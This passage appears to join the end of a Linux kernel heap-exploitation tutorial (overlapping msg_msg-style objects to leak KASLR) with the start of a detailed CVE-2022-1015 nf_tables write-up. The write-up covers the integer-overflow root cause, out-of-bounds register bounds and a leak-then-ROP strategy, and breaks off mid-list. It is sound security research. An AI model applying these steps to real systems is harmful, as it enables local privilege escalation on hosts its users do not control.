Let’s check how posix_msg_tree_node overlaps with vuln_obj:
Obj: vuln_obj ; posix_msg_tree_node
@0:  int1     ; __rb_parent_color
@8:  int2     ; *rb_right
@16: int3     ; *rb_left
@24: list     ; msg_list

Here posix_msg_tree_node is suitable as a primitive because the linked list msg_list aligns with vuln_obj.list (at offset 24 bytes).

If we manage to allocate posix_msg_tree_node in the same slab object where a vuln_obj used to reside we could influence msg_list.next and msg_list.prev via the use-after-free (by initiating other vuln_obj objects).

msg_msg 
This structure holds messages belonging to the message queue system of the kernel.
/* one msg_msg structure for each message */
struct msg_msg {
	struct list_head m_list; // @0
	long m_type; // @16
	size_t m_ts;	// @24	/* message text size */
	struct msg_msgseg *next; // @32
	void *security; // @40
	/* the actual message follows immediately */
};

It is important to note:

  *security must always hold a valid address to heap memory
  The list_head of the linked list with all the messages in the queue is at the start of the object (in contrast to vuln_obj where it is at offset 24 bytes).


Frankensteining everything together 
Now that we have introduced the objects we need to frankenstein them together to achieve the OOB read we need to leak KASLR.

To achieve that we have to do the following:

  Make a call to allocate a vuln_obj object and free it (we shall call this Object 1).
  Allocate a posix_msg_tree_node of a queue at the UAF’d (Object 1) location.
  Initiate a new vuln_obj that gets UAF’d (Object 2). The address of vuln_obj.list will get written in posix_msg_tree_node.msg_list.next so the kernel will be fooled into believing that the first message in the message queue starts at vuln_obj.list. However vuln_obj.list is at an offset of 24 bytes while msg_msg.m_list is at an offset of 0 bytes from the start of the slab object. Therefore we can get 24 bytes of OOB read by reading the first message in the queue. (take a look at the diagram for clarity)
  Allocate a user_key_payload where Object 2 used to be and pass valid heap addresses for m_list.next and m_list.prev (you need to have leaked a heap address for this - out of scope for this article but could be easily done in our example).
  Allocate a user_key_payload right under Object 2 (this is the payload object whose rcu->func we leak).
  Make a call to change the user_key_payload that is allocated under Object 2.
  Immediately make a call to fetch the first message in the message queue (with a bit of luck rcu->func() wouldn’t have been called yet).
  And we have the .text address - defeating KASLR.



  This is a simplification. In reality, to do this reliably you need to spray a ton of user_key_payload objects to get one right under Object 2. Then you need to mass edit all the payloads and then fetch the first message in the queue.



  We said prior that *security always needs to hold a valid heap address. We don’t have to worry about that as it will overlap with rcu_head->next.
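
The overlap with the neighbouring object can be checked with a few offsetof computations. This is a sketch assuming the 64-bit layouts from the struct listings above; the _mock structs and offset_in_neighbour are hypothetical helpers.

```c
#include <stddef.h>
#include <stdint.h>

#define SLAB_SIZE      64  /* kmalloc-64 */
#define FAKE_MSG_START 24  /* offset of vuln_obj.list inside Object 2 */

/* 64-bit layouts copied from the struct listings above. */
struct callback_head_mock { uint64_t next; uint64_t func; };
struct msg_msg_mock {
	uint64_t m_list_next, m_list_prev;  /* @0, @8 */
	uint64_t m_type;                    /* @16 */
	uint64_t m_ts;                      /* @24 */
	uint64_t next;                      /* @32 */
	uint64_t security;                  /* @40 */
};

/*
 * Translate an offset inside the fake msg_msg into an offset inside the
 * object that follows Object 2. Only meaningful for offsets that
 * actually cross the slab boundary (msg_off >= 40 here).
 */
static size_t offset_in_neighbour(size_t msg_off)
{
	return FAKE_MSG_START + msg_off - SLAB_SIZE;
}
```

With these numbers *security maps to offset 0 of the neighbour (rcu_head->next) and the first byte of message data, which follows the 48-byte header, maps to offset 8 (rcu_head->func).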




Resources 
Some resources you might want to check out.


  What is RCU?
  mq_overview
  keyrings


Summary 
I provided an example which allows the use of this technique. The fake example is very close to the real application of the technique in my next vulnerability write-up (which should be coming out in the next week or two).

I believe the analysis and explanation are not too difficult to grasp but if you have questions feel free to reach out to me.

Keep an eye out for when the write-up drops if you are interested in the “real life” application.


CVE-2022-1015: A validation flaw in Netfilter leading to Local Privilege Escalation
2022-11-11T10:00:00+00:00
Introduction
Hello there! Today we will be reviewing and exploring a vulnerability in the Linux kernel framework Netfilter.

This is meant to be a write-up as much as it is meant to be educational material for people just getting into the kernel vulnerability research space. I attempt to go over everything and not leave anything unexplained so it can be accessible to everyone - including those with little to no experience in vulnerability research. However, knowledge of Linux, assembly and C is assumed.

I recommend reading my article Dissecting the Linux Firewall: Introduction to Netfilter’s nf_tables before undertaking this write-up so you have a general idea of the internals of nf_tables.

When I decided that I wanted to explore and review vulnerabilities in the Netfilter framework I came across David Bouman’s write-up of this very vulnerability.
As the vulnerability proved quite interesting I decided to also do a write-up reviewing it in more detail as well as go through the process of developing the exploit for it more in-depth. My article is quite similar to his at times but also diverges greatly at others - namely in the exploitation stage.

The write-up is based on my notes that I was taking while exploring the vulnerability and trying to exploit it so there might be parts where I take the wrong way or talk about the things I missed or did incorrectly at first before figuring it out. I decided to leave those parts in the write-up as they can prove to be educational.

Table of Contents

  The Vulnerability
    Root cause
    Parser Functions
    Register translation
    Validation functions
    A big “but”
  Exploitation
    Primitives?
      nft_immediate_expr
      nft_payload
      nft_payload_set
      nft_bitwise
    An Exploitation strategy
    Leaking a kernel address
      nft_do_chain
      Scouting for a kernel address
      Leaking the address
    Road to Code Execution
      Output hook + UDP packet
      Trying the other hooks
      Exploitation vector through TCP
    Building an ROP chain
      prepare_kernel_cred
      commit_creds
      switch_task_namespaces
      swapgs_restore_regs_and_return_to_usermode
      Summarizing the ROP chain
  Proof-of-Concept
  Closing Remarks


The Vulnerability 
The vulnerability is in the nf_tables portion of the netfilter framework. The exact description for CVE-2022-1015 is:

  A flaw was found in the Linux kernel in linux/net/netfilter/nf_tables_api.c of the netfilter subsystem. This flaw allows a local user to cause an out-of-bounds write issue.


I will again recommend reading my article providing an introduction to nf_tables as it provides a good base to be able to understand the vulnerability.

Root cause 
The root cause of the vulnerability is in the functions nft_validate_register_store and nft_validate_register_load. They validate that the register index and the length of the data that is to be written (stored) or read (loaded) stay within the bounds of the registers.
However, before we take a look at them we will first take a look at the parsing functions - nft_parse_register_store and nft_parse_register_load which call the two validating functions.

Parser functions 
The parsing functions are responsible for parsing values from netlink attributes to register indexes and calling the validation functions.
/* net/netfilter/nf_tables_api.c */
int nft_parse_register_load(const struct nlattr *attr, u8 *sreg, u32 len)
{
	u32 reg; // 4 byte register variable
	int err;

	reg = nft_parse_register(attr); // gets the register index from an attribute
	err = nft_validate_register_load(reg, len); // calls the validating function
	if (err < 0) // if the validating function returned an error, pass it on to the caller
		return err;

	*sreg = reg; // save the register index into sreg (a pointer that is provided as an argument)
	// sreg = source register -> the register from which we read
	return 0;
}
EXPORT_SYMBOL_GPL(nft_parse_register_load);

int nft_parse_register_store(const struct nft_ctx *ctx,
			     const struct nlattr *attr, u8 *dreg,
			     const struct nft_data *data,
			     enum nft_data_types type, unsigned int len)
{
	int err;
	u32 reg; // 4 byte register variable

	reg = nft_parse_register(attr); // parsed from an attribute
	err = nft_validate_register_store(ctx, reg, data, type, len);
	/* here we pass a bit more arguments to the validating function */
	/* because we are going to be writing into the registers and not reading from them */
	if (err < 0)
		return err;

	*dreg = reg; // once again saves the register index into dreg
	// dreg = destination register -> the register in which we write
	return 0;
}


In the code above the reg variable is a u32 (a 32-bit integer), while the sreg and dreg pointers point to u8 variables, so they are 8-bit. This of course makes sense if you know how the registers work. The total register space is 0x50 = 80 bytes. So there is no reason to save more than the least significant byte after validation - if the register index is in-bounds it should always fit in those 8 bits.

Register translation 
Now before we go into detail on the validation functions let’s first look at the register offsets and the enum type that we have. This section could be skipped if you have a really good understanding of how register offsets are handled and translated in netfilter. However, I recommend reading as it will be important later on.

So if you have read my article on nf_tables you should know that there are two types of register offsets for the data section of the registers. There used to be only four 16-byte registers. Then those registers turned into sixteen 4-byte ones. However, due to compatibility reasons, the 16-byte register offsets also stayed. So the registers can be viewed as a single buffer with two types of offsets.



enum nft_registers {
	NFT_REG_VERDICT,
	NFT_REG_1,
	NFT_REG_2,
	NFT_REG_3,
	NFT_REG_4,
	__NFT_REG_MAX,

	NFT_REG32_00	= 8,
	NFT_REG32_01,
	NFT_REG32_02,
	...
	NFT_REG32_13,
	NFT_REG32_14,
	NFT_REG32_15,
};

Taking a look at the enum type we can see how both types of offsets exist in it. NFT_REG_VERDICT points to zero and NFT_REG_1 to NFT_REG_4 point to indexes from one to four.
We see how NFT_REG32_00 is defined as eight so NFT_REG32_01 is nine and so on and so forth.

So now what happens is a translation in the nft_parse_register function.
/* net/netfilter/nf_tables_api.c */
/**
 *	nft_parse_register - parse a register value from a netlink attribute
 *
 *	@attr: netlink attribute
 *
 *	Parse and translate a register value from a netlink attribute.
 *	Registers used to be 128 bit wide, these register numbers will be
 *	mapped to the corresponding 32 bit register numbers.
 */
static unsigned int nft_parse_register(const struct nlattr *attr)
{
	unsigned int reg;

	// from include/uapi/linux/netfilter/nf_tables.h
	// NFT_REG_SIZE = 16 (16 bytes)
	// NFT_REG32_SIZE = 4 (4 bytes)
	reg = ntohl(nla_get_be32(attr));
	switch (reg) {
	case NFT_REG_VERDICT...NFT_REG_4:
		return reg * NFT_REG_SIZE / NFT_REG32_SIZE; 
	default:
		return reg + NFT_REG_SIZE / NFT_REG32_SIZE - NFT_REG32_00;
	}
}

If the register that is parsed through a netlink attribute is between the values NFT_REG_VERDICT...NFT_REG_4 (between the values zero and four) it does a calculation which returns the register index as reg * 16 / 4  or reg * 4.

So it just scales up the register index by a factor of 4 if the old registers were used. That makes sense as the old registers were 16-byte ones and the new ones are 4-byte ones - so NFT_REG_2 translates to index 8, the same index as NFT_REG32_04 (NFT_REG_2 covers NFT_REG32_04 through NFT_REG32_07, as NFT_REG_1 already covers NFT_REG32_00 through NFT_REG32_03).

This is when the old register offsets are used. However when the new register offsets are used - the 4-byte ones - another calculation is performed. That calculation is meant to align the number from the enum to the actual register index - because in the enum type the 4-byte register offsets are themselves offset by eight - NFT_REG32_00 maps to 8.

So the calculation yields that the true register index is reg + 16 / 4 - 8 which is reg - 4.

So the true register index of NFT_REG32_00 is actually 8-4 = 4. Why four you might ask? Well, there is a verdict register that sits at the beginning of the registers which is 16 bytes wide and that is the size of four 4-byte registers so the first data register starts actually from four and not zero.
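
The translation is easy to replay in userspace. Below is a sketch that copies the switch from nft_parse_register but takes the already decoded register number instead of a netlink attribute; translate_register is a hypothetical name and the enum only lists the constants needed here.

```c
#include <stdint.h>

enum {
	NFT_REG_VERDICT = 0,
	NFT_REG_4       = 4,
	NFT_REG32_00    = 8,
	NFT_REG_SIZE    = 16,
	NFT_REG32_SIZE  = 4,
};

/* Userspace copy of the switch in nft_parse_register(), taking the
 * already byte-swapped register number instead of a netlink attribute. */
static uint32_t translate_register(uint32_t reg)
{
	if (reg <= NFT_REG_4)  /* old 16-byte numbering: 0..4 */
		return reg * NFT_REG_SIZE / NFT_REG32_SIZE;
	/* new 4-byte numbering: NFT_REG32_00 (8) and up */
	return reg + NFT_REG_SIZE / NFT_REG32_SIZE - NFT_REG32_00;
}
```

Running a few values through it shows both numbering schemes meeting in the same index space: NFT_REG_1 and NFT_REG32_00 both give 4, and NFT_REG32_15 (enum value 23) gives 19, the last 4-byte slot of the 80-byte register file.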

Extremely confusing, I know - but this is what we deal with. Now we can take a look at the validation functions.

Validation functions 
We will take a look at only one of them as the vulnerability is the same in both.
/* net/netfilter/nf_tables_api.c */
int nft_validate_register_load(enum nft_registers reg, unsigned int len)
{
	if (reg < NFT_REG_1 * NFT_REG_SIZE / NFT_REG32_SIZE)
		/* NFT_REG_1 * NFT_REG_SIZE / NFT_REG32_SIZE is 1 * 16 / 4 = 4 */
		/* this check is essentially reg < 4 */
		/* this essentially checks if you are reading the verdict */
		/* the verdict is located at reg offsets 0 to 3 */
		/* if attempting to load the verdict it returns an EINVAL */
		return -EINVAL;
	if (len == 0) // if trying to read with len = 0, return EINVAL - makes sense
		return -EINVAL;
	if (reg * NFT_REG32_SIZE + len > sizeof_field(struct nft_regs, data))
		/* NFT_REG32_SIZE = 4 */
		/* sizeof_field(struct nft_regs, data) gets the size of the registers */
		/* the size of the registers in total is 0x50 = 80 */
		/* reg * 4 + len > 0x50 */ 
		/* This rule is to make sure we are not loading and storing */
		/* outside of the registers */
		/* going outside of the registers would be dangerous as */
		/* the registers are on the stack so reading or writing outside of them */
		/* would be directly writing out-of-bounds on the stack in **kernel-space** */
		/* if going OOB it returns an ERANGE error */
		return -ERANGE;
	
	return 0;
}

You might have spotted the vulnerability in the last if-statement.

if (reg * NFT_REG32_SIZE + len > sizeof_field(struct nft_regs, data))

The constant NFT_REG32_SIZE is 4. If we pass a big enough value for reg, then multiplying it by 4 and adding len overflows the integer. That allows very high values of reg to pass the check when they normally wouldn’t.

Let us look at an example. If we assume reg to be a 32-bit integer as it is in nft_parse_register_load then the maximum value we could pass for reg is 0xffffffff - four bytes of 0xff. With such a value of reg, multiplying by four gives 0x3FFFFFFFC, which is more than four bytes. In this case only the lower four bytes (0xfffffffc) are kept for the next computation.

Let’s say we have len = 0x20. Then the computation in the if-statement yields 0xfffffffc + 0x20 = 0x10000001C. Again that value is more than 4 bytes so only the lower four are kept, leaving a final value of 0x1c. The check 0x1c > 0x50 is false, which means that no error is returned and the register value we pass (0xffffffff) is accepted as valid even though it is not.
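The wrap-around is easy to reproduce in userland. The following is a sketch of the same three checks on explicit 32-bit unsigned values; the function and macro names are mine, and I am assuming 32-bit arithmetic here (whether the kernel build really uses 32 bits is examined further down).

```c
#include <errno.h>
#include <stdint.h>

#define NFT_REG32_SIZE     4u
#define NFT_REGS_DATA_SIZE 0x50u /* sizeof_field(struct nft_regs, data) */

/* Same three checks as the validation function, on explicit u32 values. */
int validate_register_load(uint32_t reg, uint32_t len)
{
	if (reg < 4)
		return -EINVAL;
	if (len == 0)
		return -EINVAL;
	/* uint32_t arithmetic wraps modulo 2^32, so a huge reg can land below 0x50 */
	if (reg * NFT_REG32_SIZE + len > NFT_REGS_DATA_SIZE)
		return -ERANGE;
	return 0;
}
```

Calling it with reg = 20 and len = 4 gives -ERANGE as intended, while reg = 0xffffffff and len = 0x20 returns 0.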

If you remember, nft_parse_register_load and nft_parse_register_store save only the least significant byte of the register into sreg and dreg (because both are of type u8). So in the end sreg or dreg would be just 0xff. That is still out of the bounds of nft_regs, which is 0x50 bytes in size.

That would mean that we could potentially read and write out of the bounds of nft_regs directly on the stack.

Even though I just used 0xffffffff as an example value that at the end evaluates at 0xff - the highest value that could reach the validation function is 0xfffffffb due to how the registers are parsed. We took a look at that already but let’s go over it again.

In the enum type, the 16-byte registers (including the verdict) hold values from 0 to 4. Everything higher than that is considered a 4-byte register and when those are evaluated 4 is subtracted from them to align them correctly. You might want to go back to that section to re-read it if something is unclear.

That means that if we pass 0xffffffff it would be decreased by 4 before it even reaches the validation function so reg by that point would be equal to 0xfffffffb. As only the lowest byte of that would be taken for the actual register value - the register we will have is 0xfb. That is true for all register values that we pass higher than 4. This would mean that the highest register index we can get is 0xfb.

However, there is a way to reach the register values from 0xfc to 0xff. Until now we used the base 0xffffffXX for the register values we pass but we could also use 0x3fffffXX and 0x7fffffXX. If we use a lower base - for example, 0x3fffffXX - we could pass a value like 0x40000003 that when decreased by 4 will be equal to 0x3fffffff. When the least-significant byte is taken it evaluates to register index 0xff. That’s how we reach the highest register indexes.
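The relationship between the value we pass and the index that ends up in the u8 can be sketched in a few lines. Both function names are made up for this illustration, and both assume the passed value is above NFT_REG_4 so that the "subtract 4" branch is taken.

```c
#include <stdint.h>

/* Value sent in the netlink attribute -> index stored in the u8 sreg/dreg. */
uint8_t stored_register(uint32_t attr_value)
{
	uint32_t reg = attr_value - 4u; /* alignment step for values above NFT_REG_4 */
	return (uint8_t)reg;            /* only the least-significant byte is kept */
}

/* 32-bit result of reg * 4 + len; the check passes when this is <= 0x50. */
uint32_t bounds_expr(uint32_t attr_value, uint32_t len)
{
	return (attr_value - 4u) * 4u + len;
}
```

Passing 0xffffffff stores 0xfb, while passing 0x40000003 stores 0xff, and in both cases the bounds expression wraps to a small value for len = 0x20.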


  In all future mentions of register indexes -> the register index refers to the REAL index (after they are decreased by 4).


A big “but” 
But all of that is under the assumption that the register that reaches the validation function is indeed 32-bit. And that might not be true. The parameter of the function is of type enum nft_registers. By default, an enum should be guaranteed to hold integer values (32-bit). However, an optimization might be active that makes the size of an enum only big enough to hold the values provided in its definition. If that optimization is active that would mean our enum nft_registers would be of size char (1 byte). In that case, only the least-significant byte would reach the faulty validation - complicating things.
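With GCC and Clang this kind of narrowing is what the -fshort-enums flag does. As a small sketch, the stand-in enum below (not the kernel's definition) has enumerators that all fit in one byte, so its size shows which behaviour a given compiler invocation uses.

```c
#include <stddef.h>

/* Stand-in for enum nft_registers: every enumerator fits in one byte. */
enum small_regs { SMALL_REG_FIRST = 0, SMALL_REG_LAST = 23 };

/* Number of bytes the compiler actually reserves for the enum type. */
size_t small_regs_size(void)
{
	return sizeof(enum small_regs);
}
```

Compiled without the flag on a typical x86_64 Linux toolchain, the enum is as large as an int; with -fshort-enums it should shrink to a single byte. This only tells us about a userland build, so checking the kernel's generated assembly is still necessary.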

There is no information showing if that optimization is active by default in the kernel.
So the only way to say is to look at the assembly of the validation function. Let’s do that.
; nft_parse_register_load - kernel built from source at tag 5.12
0xffffffff81a6c870 <+0>:	call   0xffffffff81065160 <__fentry__>
0xffffffff81a6c875 <+5>:	mov    eax,DWORD PTR [rdi+0x4]
0xffffffff81a6c878 <+8>:	bswap  eax
0xffffffff81a6c87a <+10>:	mov    edi,eax
0xffffffff81a6c87c <+12>:	lea    ecx,[rax-0x4]
0xffffffff81a6c87f <+15>:	shl    edi,0x4
0xffffffff81a6c882 <+18>:	shr    edi,0x2
0xffffffff81a6c885 <+21>:	cmp    eax,0x4
0xffffffff81a6c888 <+24>:	mov    eax,edi
0xffffffff81a6c88a <+26>:	cmova  eax,ecx
0xffffffff81a6c88d <+29>:	test   edx,edx
0xffffffff81a6c88f <+31>:	je     0xffffffff81a6c8a3 
0xffffffff81a6c891 <+33>:	cmp    eax,0x3
0xffffffff81a6c894 <+36>:	jbe    0xffffffff81a6c8a3 
0xffffffff81a6c896 <+38>:	lea    edx,[rdx+rax*4]
0xffffffff81a6c899 <+41>:	cmp    edx,0x50
0xffffffff81a6c89c <+44>:	ja     0xffffffff81a6c8a9 
0xffffffff81a6c89e <+46>:	mov    BYTE PTR [rsi],al
0xffffffff81a6c8a0 <+48>:	xor    eax,eax
0xffffffff81a6c8a2 <+50>:	ret    
0xffffffff81a6c8a3 <+51>:	mov    eax,0xffffffea
0xffffffff81a6c8a8 <+56>:	ret    
0xffffffff81a6c8a9 <+57>:	mov    eax,0xffffffde
0xffffffff81a6c8ae <+62>:	ret    

If we take a look at <+38> and the few instructions below, we can see the generated assembly of the vulnerable if-statement (the validation function has been inlined into nft_parse_register_load).

We can see that in my case the nft register index is in rax and len is in rdx. The lea computes rdx + rax * 4 and saves only the lower 32 bits of the result into edx. Then edx is compared to 0x50. The index is handled as a full 32-bit value (eax) all the way through, which clearly shows that the register size in the function is not shrunk by the enum optimization.

Exploitation 
Now that it is clear that no optimization is in our way we can take a look at how we could potentially exploit this.

In order to be able to exploit this we would need to be able to create and modify nf_tables objects - tables, chains, etc. To do that we need the capability CAP_NET_ADMIN. Thankfully we can obtain it in a user+network namespace. We will just have to make sure to leave the namespace during exploitation.

This vulnerability is essentially an incorrect validation. It allows us to set register values such that we access addresses on the stack outside of nft_regs. That gives us an out-of-bounds read and write, which can lead to arbitrary code execution in kernel-space.

Primitives? 
It is time to look into what our primitives are. All the expressions use the registers in some way - either by reading from them or writing to them. Now the question is about looking for the ones most useful to help us exploit this vulnerability.

nft_immediate_expr 
This one writes constant data to the registers. So in theory it could be used for an OOB write.

However, with this expression we can only write up to 16 bytes, which is not ideal. That 16-byte limit also severely restricts the register values we can pass.

The minimal register value that still passes the validation is 0xfffffffc, which is very restrictive.

nft_payload 
The nft_payload expression is used to copy directly from the packet to the registers. With an out-of-bounds destination register that makes it a perfect expression for an OOB write. We can copy up to 0xff bytes at once, which is the most we can get from any expression. Let’s find out our lower and upper bounds.

Our lower bound is reached when we max out our len at 0xff. The minimal register value that still passes the validation is then 0xffffffc1. That means the lowest offset we can access is 0xc1 * 4 = 0x304 relative to the beginning of nft_regs on the stack.

Our upper bound is reached when our register index is the highest possible, 0xff. At that register value the highest length we can have is 0x54, because 0x3fffffff * 4 + 0x54 wraps around to 0x50, which is not greater than 0x50. This means that the highest offset we can reach is 0xff * 4 + 0x54 = 0x450.

So the window we can access starts at offset 0x304 and ends at offset 0x450. That leaves us with 0x14c = 332 bytes of the stack within reach.
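These bounds can be double-checked by brute force. The sketch below is my own helper code and assumes the 32-bit wrapping check shown earlier; it searches for the lowest accepted register byte for a given len and for the largest accepted len for a given register.

```c
#include <stdint.h>

/* The (wrapping) range check from the validation function. */
static int passes_check(uint32_t reg, uint32_t len)
{
	return reg * 4u + len <= 0x50u;
}

/* Lowest register byte XX, used as 0xffffffXX, that is accepted for len. */
int lowest_oob_register(uint32_t len)
{
	for (uint32_t low = 0; low <= 0xff; low++)
		if (passes_check(0xffffff00u | low, len))
			return (int)low;
	return -1;
}

/* Largest len (at most 0xff) accepted for a register value, or 0 if none is. */
uint32_t largest_len(uint32_t reg)
{
	for (uint32_t len = 0xff; len > 0; len--)
		if (passes_check(reg, len))
			return len;
	return 0;
}
```

For len = 0xff the search lands on 0xc1, and for the register value 0x3fffffff the largest accepted len is 0x54, matching the numbers above.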

nft_payload_set 
The nft_payload_set does the opposite of the nft_payload. Instead of copying from the packet to the registers - this expression can be used to copy from the registers and write onto the packet, which makes it suitable for an OOB read. It has the same bounds as nft_payload.
struct nft_payload_set {
	enum nft_payload_bases	base:8;
	u8			offset;
	u8			len;
	u8			sreg;
	u8			csum_type;
	u8			csum_offset;
	u8			csum_flags;
};

The difference is that it takes a source register sreg instead of a destination register dreg. It also has some checksum options but they are not relevant to us.

nft_bitwise 
This expression is used to perform bitwise operations on the registers.
struct nft_bitwise {
	u8			sreg;
	u8			dreg;
	enum nft_bitwise_ops	op:8;
	u8			len;
	struct nft_data		mask;
	struct nft_data		xor;
	struct nft_data		data;
};

It takes a source register sreg and a length len, which together select the registers the bitwise operation is performed on. The destination register dreg specifies where the result of the operation is stored.

The op parameter of type nft_bitwise_ops specifies the type of bitwise operation. You can read all about the types in my article on nf_tables but here we will review only the one that concerns us.

We will be using this expression to copy from register to register without performing any bitwise operation. We are going to use it in case we need to copy some data from out-of-bounds ‘registers’ to the actual registers. To do this we set op to either NFT_BITWISE_LSHIFT or NFT_BITWISE_RSHIFT and pass zero as the data (here the data is the amount we shift by).

What are our bounds when we use this expression?

Here the boundaries are a bit different. Our max length cannot be 0xff because if it is then both our sreg and dreg would be out-of-bounds which we don’t want. So our length must be 0x40 = 64 at the maximum (16 data registers each 4 bytes).

Our lower bound would then be when we barely cross the threshold of validity but our len is the maximum we could have - 0x40. This means that our lower bound would be when our register value is 0xfffffff0 - because 0xfffffff0 * 4 + 0x40 = 0x00 < 0x50. Converted to byte offset that would be 0xf0 * 4 = 0x3c0 relative to the beginning of nft_regs.

Our upper bound is reached with the highest register index we can have, 0xff, and the length still at its maximum of 0x40. In that case 0x3fffffff * 4 + 0x40 = 0x3c < 0x50. Converted to a byte offset that is 0xff * 4 + 0x40 = 0x43c.

So in total we could read from offset 0x3c0 to offset 0x43c with this expression - 0x7c = 124 bytes range.

Those are all of the expressions needed to exploit this vulnerability.

An Exploitation strategy 
The exploitation strategy is pretty simple. The netfilter hook we use for our chain and the protocols we choose for the packets going through the firewall all change the stack layout. This means that if the stack layout is not favourable at our OOB read and write range we can experiment a lot with hooks and protocols until we have a favourable stack layout to do what we need to do. So our strategy is essentially:

  Find a good hook and protocol such that there is a kernel address in our OOB read range.
  Leak the address and calculate the kernel base.
  Find a good hook and protocol such that the stack layout at our OOB write range is good enough for us to be able to inject a full ROP chain on the stack.
  Build an ROP chain and inject it… voilà.


Leaking a kernel address 
The first stage of exploitation is to find a way to leak a kernel address to find the kernel base. It is essential that we find the kernel base address in order to actually exploit the vulnerability. Due to “Kernel Address Space Layout Randomization” (KASLR) the kernel is loaded at a different address in memory each time (at boot). In order to use an ROP chain we need to know the base address to calculate the addresses the ROP gadgets will be located at. Thankfully, because we have an OOB read, we have a very good chance of leaking a kernel address and defeating KASLR.

nft_do_chain 
If you have read the article on nf_tables you know that nft_do_chain is executed to go through the rules in a chain and execute their expressions whenever a hook is ‘triggered’.

Looking at the generated assembly of nft_do_chain we need to locate instructions accessing the registers to determine where on the stack the registers are.
0xffffffff81a6bb40 <+0>:     call   0xffffffff81065160 <__fentry__>
0xffffffff81a6bb45 <+5>:     push   rbp
0xffffffff81a6bb46 <+6>:     mov    rbp,rsp
0xffffffff81a6bb49 <+9>:     push   r15
0xffffffff81a6bb4b <+11>:    mov    r15,rdi
0xffffffff81a6bb4e <+14>:    push   r14
0xffffffff81a6bb50 <+16>:    push   r13
0xffffffff81a6bb52 <+18>:    push   r12
0xffffffff81a6bb54 <+20>:    push   rbx
0xffffffff81a6bb55 <+21>:    and    rsp,0xfffffffffffffff0
0xffffffff81a6bb59 <+25>:    sub    rsp,0x1a0
0xffffffff81a6bb60 <+32>:    mov    rax,QWORD PTR [rdi+0x20]
0xffffffff81a6bb64 <+36>:    mov    QWORD PTR [rsp+0x8],rsi
0xffffffff81a6bb69 <+41>:    mov    rax,QWORD PTR [rax+0x20]
0xffffffff81a6bb6d <+45>:    mov    BYTE PTR [rsp+0x4d],0x0
0xffffffff81a6bb72 <+50>:    movzx  eax,BYTE PTR [rax+0xe94]
0xffffffff81a6bb79 <+57>:    mov    BYTE PTR [rsp+0x13],al
0xffffffff81a6bb7d <+61>:    nop    DWORD PTR [rax+rax*1+0x0]
0xffffffff81a6bb82 <+66>:    mov    rax,QWORD PTR [rsp+0x8]
0xffffffff81a6bb87 <+71>:    mov    DWORD PTR [rsp+0x14],0x0
0xffffffff81a6bb8f <+79>:    mov    QWORD PTR [rsp+0x18],rax
0xffffffff81a6bb94 <+84>:    cmp    BYTE PTR [rsp+0x13],0x0
0xffffffff81a6bb99 <+89>:    mov    rax,QWORD PTR [rsp+0x18]
0xffffffff81a6bb9e <+94>:    je     0xffffffff81a6be90 
0xffffffff81a6bba4 <+100>:   mov    r12,QWORD PTR [rax+0x8]
0xffffffff81a6bba8 <+104>:   mov    rax,QWORD PTR [r12]
0xffffffff81a6bbac <+108>:   mov    DWORD PTR [rsp+0x50],0xffffffff ; regs.verdict.code = NFT_CONTINUE;  
0xffffffff81a6bbb4 <+116>:   mov    rbx,QWORD PTR [r12]
0xffffffff81a6bbb8 <+120>:   test   rbx,rbx
...
0xffffffff81a6bc93 <+339>:   mov    r8d,DWORD PTR [rsp+0x50]
0xffffffff81a6bc98 <+344>:   cmp    r8d,0xffffffff
0xffffffff81a6bc9c <+348>:   jne    0xffffffff81a6c039  
...

The instruction of importance is at <+108>. Let’s take a deeper look at it.

At the beginning of do_chain in nft_do_chain there is this line of code
regs.verdict.code = NFT_CONTINUE;

You probably know that NFT_CONTINUE is the default verdict code.
enum nft_verdicts {
	NFT_CONTINUE	= -1, // -1 is 0xffffffff due to Two's Complement
	NFT_BREAK	= -2,
	NFT_JUMP	= -3,
	NFT_GOTO	= -4,
	NFT_RETURN	= -5,
};

So this instruction at <+108> sets the verdict register to NFT_CONTINUE.

The verdict register is the first register - sitting at the very start - and it is located at rsp+0x50.
That means that the registers occupy the space on the stack from rsp+0x50 to rsp+0xa0.

Also looking at the instructions at <+339> and <+344> we can see the check validating that the verdict is still NFT_CONTINUE.

gdb-peda$ x/20xw ($rsp+0x50) // printing the registers -> we print 20 words (20 (4 byte) words is 80 bytes = 0x50)
0xffffc90000003c50:     0xffffffff      0x00000000      0x00000000      0x00000000
0xffffc90000003c60:     0x00000011      0xffffffff      0x8105ceac      0xffffffff
0xffffc90000003c70:     0x8117f965      0xffffffff      0xffffffff      0x7fffffff
0xffffc90000003c80:     0x00000006      0x00000000      0x3a61cec0      0xffff8880
0xffffc90000003c90:     0x00000001      0x00000000      0x00011795      0x00000000


Now we know where on the stack the nft_regs are located.

Scouting for a kernel address 
We already have established that we can do an OOB read and write with nft_bitwise. Using this expression will allow us to copy data from the OOB range and put it into our registers. Then we could use a nft_payload_set to get the data we saved into the registers and put it into a packet. Once it is in the packet we can listen for it - and read the leaked data.


  A small note: It is not necessary to use both nft_bitwise and nft_payload_set. You could just use nft_payload_set to directly copy it from the OOB range into the packet. However, when I was writing the exploit I chose to use first nft_bitwise and then nft_payload_set.


We know that with nft_bitwise we can leak from offset 0x3c0 to offset 0x43c - that’s 15 and a half 8-byte words range.

Now let’s take a look at the stack layout when we set up a chain with an output hook (NF_INET_LOCAL_OUT) and use a UDP packet. Using an output hook means that the rules and expressions we set will be executed right before the packet leaves the host. We will use a UDP packet as it is the simplest option and a one-off - it doesn’t need a connection like a TCP one.

gdb-peda$ x/16gx ($rsp+0x50+0x3c8)
0xffffc90000227d78:     0x0000000000000008      0xffff8880052dd680
0xffffc90000227d88:     0x0000000000000004      0x0000000000000000
0xffffc90000227d98:     0xffffffff819bfc63      0xffff88800e1db180
0xffffc90000227da8:     0xdd4d4cb9a478c900      0xffff88800e1db180
0xffffc90000227db8:     0xffffc90000227df8      0xffff88800e1db180
0xffffc90000227dc8:     0x0000000000000010      0x0000000000000004
0xffffc90000227dd8:     0x0000000000000000      0xffffc90000227e28
0xffffc90000227de8:     0xffffffff819b7ab7      0xffffffff819b7ab7

The address saved at 0xffffc90000227d98 immediately stands out as it is obviously a .text address. This serves us perfectly. It is at offset 0x3e8 relative to the beginning of nft_regs.

Leaking the address 

Leaking the address is straightforward now. We have a .text address ready to be leaked in our OOB read range when we use an output hook and send a UDP packet to ourselves on the loopback interface. Now we need to construct a rule with the proper expressions. First, we copy the address from the OOB range to the registers. Then we need to copy the address from the registers and write it to the UDP packet’s payload. And finally, we just need to be listening for UDP packets so we can receive back the packet carrying the address.

To do that we need to make a rule with the following expressions:

  bitwise expression
    
